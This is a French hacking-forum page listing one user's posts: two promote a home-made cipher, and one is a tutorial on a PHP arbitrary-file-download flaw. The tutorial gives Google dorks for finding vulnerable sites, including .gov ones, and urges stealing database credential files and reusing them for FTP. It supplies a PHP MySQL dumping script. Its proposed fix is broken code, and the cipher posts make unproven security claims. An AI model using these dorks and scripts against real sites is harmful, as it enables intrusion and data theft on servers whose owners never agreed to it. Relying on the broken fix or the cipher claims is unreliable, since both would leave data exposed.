logo Homepage
+  NewbieContest
Username:
Password:
  Voir les messages
Pages: [1]
1  Général / Suggestions/Dev. du site / Re : [Suggestion] Logiciel pour la rubrique "Crypto - Logiciels" le: 24 Septembre 2009 à 10:52:20
Il est vrai, je l'admet, que la sécurité de l'algorithme A2DCrypt n'a pas été prouvé par des spécialistes, et que, par conséquent, l'auteur ne peut en aucun cas prétendre que ce logiciel peut assurer la sécurité des données face aux attaques.

Cependant, ce n'est pas la première fois que la sécurité d'un algorithme ne peut être démontrée, selon la communauté cryptologiste:
Citation
The problem is that we cannot measure the strength of a cipher.  But
that means *any* cipher, even the well-regarded ones.
( http://www.ciphersbyritter.com/NEWS3/MEMO.HTM#36376ccf.5706026@news.io.com )


Citation
je ne vois pas l'intérêt d'utiliser un algorithme de chiffrement sorti du chapeau alors que j'ai à ma disposition d'autres algo éprouvés, certifiés, avec plusieurs implémentations différentes, une portabilité assurée, etc.
C'est également vrai pour l'implémentation, le code source n'est pas disponible (également sauf erreur de ma part), et n'est implantée que dans cet unique logiciel. Mais le fait que cet algorithme soit "sorti du chapeau" et qu'il ne soit pas prouvé sûr par des experts ne signifie en aucun cas qu'il ne peut être efficace:
Citation
En effet, un ingénieur informaticien de Stanford University fait remarquer que les fonctions mathématiques intégrées à un simple programme comme Microsoft Excel lui permettent de concevoir en moins d'une heure un système de cryptage très efficace.
(http://www.futura-sciences.com/fr/news/t/recherche/d/limiter-le-cryptage-impossible-repondent-les-specialistes_90/)

Citation
Maintenant, quelle garantie ai-je de la part du concepteur que son chiffrement est sûr ? Aucune. D'une tendance paranoïaque, je ne peux me permettre de le croire.
Je comprend parfaitement qu'un site sur la sécurité tel que NC ne peut se permettre de mettre à disposition des outils de cryptage qui puissent être faibles, de plus, et tu as parfaitement raison, A2DCrypt ne respecte pas le dernier principe de Kerckhoffs ("Le système de chiffrage doit être au préalable examiné par des experts."), mais en ce qui concerne les garanties, je ne peu m'empêcher de citer l'anecdote concernant le DES (Data Encryption Standard), "certifié" par la NSA:

Citation
L'algorithme initialement conçu par IBM utilisait une clé de 112 bits. L'intervention de la NSA a ramené la taille de clé à 56 bits.
Cela suscita des rumeurs selon lesquelles la NSA aurait volontairement affaibli l'algorithme, dans le but de pouvoir le casser
( http://fr.wikipedia.org/wiki/Data_Encryption_Standard )

En tout cas, si j'ai suggéré ce logiciel à NC, c'est avant tout parce que je pense qu'il est, après lecture attentive de la ref, de bonne qualité (je suis un etudiant en licence pro securité informatique, j'ai donc partiellement étudié le domaine),  et est proposé par des sites de téléchargement d'une certaine ampleur, qui, tout comme NC je l'admet, ne distribuent pas de logiciels ou documents défaillants:

http://www.toocharger.com/fiches/logiciels/a2dcrypt-software/39103.htm
http://www.logitheque.com/logiciels/windows/antivirus_securite/cryptographie/telecharger/a2dcrypt_29551.htm
http://www.geardownload.com/security/a2dcrypt-2048-bits-encryption.html

Pour finir, si tu as considéré ces messages comme du spam, je m'excuse, car ce n'était en aucun cas le but. C'est une rubrique de suggestion, j'ai donc pensé que c'était normal de proposer des lien vers des logiciels précis.
2  Général / Suggestions/Dev. du site / [Suggestion] Logiciel pour la rubrique "Crypto - Logiciels" le: 23 Septembre 2009 à 16:25:35
Bonjour,

  J'ai découvert un excellent logiciel de cryptage gratuit, très rapide et puissant de type block-cipher, qui utilise des clés de 2048 bits, et je souhaiterai le partager avec la comm, voici le lien et le descriptif officiel:

Logiciel: http://www.netnavis.hostoi.com/a2dcrypt/download_a2dcrypt.php

Référence de l'algorithme: http://www.netnavis.hostoi.com/a2dcrypt/a2dcrypt-ref.zip

Capture d'écran: http://www.netnavis.hostoi.com/a2dcrypt/capt.jpg


Code:
Cryptage de fichiers avec des clés de 2048 bits. Très rapide, A2DCrypt assure une protection de très haute qualité.

A2DCrypt est un logiciel de cryptage de fichiers prenant des clé d’une longueur de 2048 bits. Munis d’une interface simple à prendre en
main, l’utilisation est facile et accessible à tous. Compatible, léger, rapide, sécurisé, et grace à un algorithme de cryptage très résistant
A2DCrypt offre une protection de qualité. A2DCrypt apportera satisfaction aux particuliers et aux entreprises désirant protéger efficacement
leurs données sensibles.

En effet, l’algorithme implanté est conçu pour résister aux attaques de cryptanalyse. De plus, la longueur de la clé privée (2048 bits) offre
une sécurité plus que suffisante.

A2DCrypt est capable de générer des clés de 2048 bits aléatoirement, à la demande de l’utilisateur. Ces clés, stockées dans des fichiers,
sont utilisées pour le chiffrement des documents. Le seul moyen de décoder le document sera de donnée la même clé qu’au chiffrement.
Ainsi, la seule attaque possible serait de tester les 3,231700607131100730071487668867e+616 clés différentes.

En plus d’être basée sur la longueur de la clé, A2DCrypt utilise des parades permettant d’éviter les déchiffrements utilisant des méthodes
plus ou moins standards.

Cordialement.
3  Général / Proposition de tutoriaux / [rejeté] [HACKING / SECURITE] Faille EXCLUDE le: 02 Février 2008 à 19:17:52
WEB - PHP
La faille EXCLUDE
- - - - - - - - -
Version: 1.0, Scoder.
- - - - - - - - -

 1° INTRO.
 2° Explication
 3° Recherche
 4° Exploiatation
 5° Conclusion

-
1° INTRO.

  Le CyberEspace regorge de failles en tout genres et à tous les niveaux, certe. Ici, nous allons
parler uniquement d'une faille Web PHP qui concerne tous les scripts d'envoie de fichiers non
contrôlés, et présente sur environ 60% des systèmes permettant à un script de manipuler les
headers HTTP dans l'objectif d'envoyer un fichier.

-
2° Explication

  Cette faille peut être appellée la faille Exclude, car, contrairement à la vulnérabilité Include,
elle permet non pas d'inclure un fichier sur une page, mais de recevoir le fichier de son choix
en provenance du serveur atteint. Il suffit simplement de modifier les paramètres de l'URL
(comme la faille Include), ou de modifier la valeur d'une variable HTML de type 'HIDDEN', cela
dépend du script et de la façon de demander un fichier. Le script PHP procède comme ceci:

- - - [C U T   H E R E] - - -

<?

echo $filename;
header("Content-type: application/force-download");
header("Content-Disposition: attachment; filename=".$filename);
readfile($filename);

?>

- - - [C U T   H E R E] - - -

  Ici, le problème est que le script ouvre le fichier puis nous envoie son contenu, ce qui fait que l'on peut
télécharger les codes PHP sans qu'ils soient interprétés par le serveur. De plus,
aucun contrôle n'est efféctué sur le nom du fichier passé en paramètre.
Ainsi, il est possible de télécharger tout fichier, à condition qu'il soit possible au deamon web
d'y accèder en lecture, et bien sur de connaître l'emplacement exact des fichiers à obtenir.

La contre-mesure serait donc:

- - - [C U T   H E R E] - - -

<?

echo $filename;
if($filename[0]=='/' || $filename[0]=='\') die "Error !";
$filename=str_replace($filename, "..", "./");
header("Content-type: application/force-download");
header("Content-Disposition: attachment; filename=".$filename);
readfile($filename);

?>

- - - [C U T   H E R E] - - -

-
4° Recherche

  Le moyen le plus éfficace pour trouver des sites vulnérables est Google. En effet, ce
Meta-Searcher recense tous les liens, quels qu'ils soient.
  Par exemple:

RECHERCHE GOOGLE: inurl:download.php? inurl:file= "errno = 2"

Thèrmes: inurl:download.php?    -> Dans l'url un script de download, prenant un argument.
         inurl:file=            -> Si possible, le nom d'un fichier légitime, toujours dans l'url.
         "errno=2"              -> Erreur de script pour le téléchargement d'un fichier légitime,
                                   comme ça, je constate que les admins n'ont pas prévus de parade,
                                   et de plus, j'ai une idée de l'endroit où est ce script,
                                   ce qui me permet de me repérer dans l'arborescence.

Si je veux atteindre un type de site précis, je tape en plus: site:.com ou encore site:.org, etc...
Tapez: inurl:download.php? inurl:file= inurl:.gov , vous aurez des (bonnes) surprises...  ;-)

-
5° Exploitation

  Cette faille permet donc d'obtenir tous les fichiers que le deamon peut lire (même /etc/passwd)
mais la meilleur exploitation possible, je pense, est de télécharger le script PHP de connexion
à la base de données (s'il y en a une), comme ça vous aurez tous les droits possibles dessus,
mais en plus, je dirais que à l'heure actuelle (2007), 40% des serveurs utilisent les mêmes mots
de passes pour SQL et FTP  ;-). Ci dessous, un script en PHP vous permettant de télécharger la
basse de donnée MySQL d'un site en fonction des codes récupérés:

- - - [C U T   H E R E] - - -

<?
/*
 * MySQL Database Viewer/Downloader - V0.1, $coder 2007.
 * ---------------------|------|------------------------
 *    Parameters        |Values|
 * ---------------------|------|------------------------
 *              opt        1        stock on a local file
 *                                  the result, and force
 *                                  the HTTP download.
 * ---------------------|------|------------------------
 *      datab             "db"      The db name
 * ---------------------|------|------------------------
 *           query       "query"    Execute the query
 * ---------------------|------|------------------------
 *          host         "host"     The host name
 * ---------------------|------|------------------------
 *         user          "user"     The user name
 * ---------------------|------|------------------------
 *          password     "pwd"      The db password
 * ---------------------|------|------------------------
 *          tmp_f       "fname"     The tmp_fname
 * -----------------------------------------------------
 */

$opt       = $_REQUEST['opt'];
$query     = $_REQUEST['query'];
$dbn       = $_REQUEST['datab'];

$host  =  $_REQUEST['host'];
$user  =  $_REQUEST['user'];
$pass  =  $_REQUEST['passwd'];

$tmp_f =  $_REQUEST['tmp_f'];

?>

<p><b><font size="4" face="Courier New">Welcome to the DataBase Viewer/Downloader</font></b></p><br>

<?
/* Ici, on part du principe que $text est deja sous forme convenable (balises, etc...)
 */
function _Out($text)
{
   if($opt!=1)
   {
      echo $text;
      echo "<br>";
   }
   else
   {
      if($tmp_f)
      {
         $fp=fopen($tmp_f, "w");
         echo "<b>-></b> Ouverture du fichier <b>".$tmp_f."</b>...<br>";
      }else{
         $fp=fopen("tmpf.tmp", "w");
         echo "<b>-></b> Ouverture du fichier...<br>";
      };
      echo "<b>Ecriture en cours...</b><br>";
      fputs($fp, $text);
      fclose($fp);

      if($tmp_f)
      {
?>
<b><a href="<? echo $tmp_f ?>">cliquez ici</a></b><br>
<?
       }
      else
      {
?>
<b><a href="tmpf.tmp">cliquez ici</a></b><br>
<?
       };
   };
}

$conn = mysql_connect($host, $user, $pass) or die(mysql_error());
if($dbn){
mysql_select_db($dbn, $conn) or die(mysql_error());
}
else
{
  $result = mysql_list_dbs($conn);
   $txt.="<table>\n";
   while ($line = mysql_fetch_assoc($result))
      {
         $txt.="\t<tr>\n";
         foreach ($line as $col_value) {
            $txt.="\t\t<td>$col_value</td>\n";
         }
         $txt.="\t</tr>\n";
      }
   $txt.="</table>\n";
      _Out($txt);
};

$txt="<html>";
if($query!="" && $dbn!="")
{
   $result = mysql_query($query) or die(mysql_error());
   $txt.="<table>\n";
   while ($line = mysql_fetch_assoc($result))
      {
         $txt.="\t<tr>\n";
         foreach ($line as $col_value) {
            $txt.="\t\t<td>$col_value</td>\n";
         }
         $txt.="\t</tr>\n";
      }
   $txt.="</table>\n";
}
else
{
   echo "<b>Entrez une requete valide !</b><br>";
};

_Out($txt);
mysql_free_result($result);
mysql_close($conn);

?>

- - - [C U T   H E R E] - - -

-
6° Conclusion

  La faille exclude est très fréquentes, même sur certains sites gouvernementaux, mais n'est pas très connue
des administrateurs, de plus, elle est facilement exploitable pur **orthographe !** qui a un minimum de connaissance
en programmation Web. C'est donc une faille dangereuse, facile à dépister avec Google, dont, je l'espère,
ce tutorial vous aura été utile si vous avez ce genre de problèmes.

Scoder.
Pages: [1]